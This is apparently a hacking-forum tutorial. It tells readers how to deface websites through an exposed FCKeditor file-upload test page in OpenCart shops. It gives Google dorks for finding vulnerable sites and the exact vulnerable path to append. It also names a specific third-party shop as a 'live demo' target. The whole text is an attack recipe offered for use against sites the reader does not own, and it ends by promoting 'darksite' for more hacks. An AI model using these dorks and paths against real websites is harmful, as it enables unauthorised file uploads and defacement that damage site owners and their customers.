WORDPRESS fAkeditor upload Vunerablity : Upload Your file and Deface easily

WordPress Hacks

This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here

1- open Google.com and enter Dork:

inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
nurl:Powered By OpenCart

You'll Got a lot of websites by google, select anyone ... For Example i got this one

http://www.schoolshopper.com.au/

Then i'll will simply add the vuln URL after the website

Live Demo:

http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

(The path May be chnaged in other Website,
Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Thankyou for reading keep in touch with darksite to learn more hacks and Web vulnerability.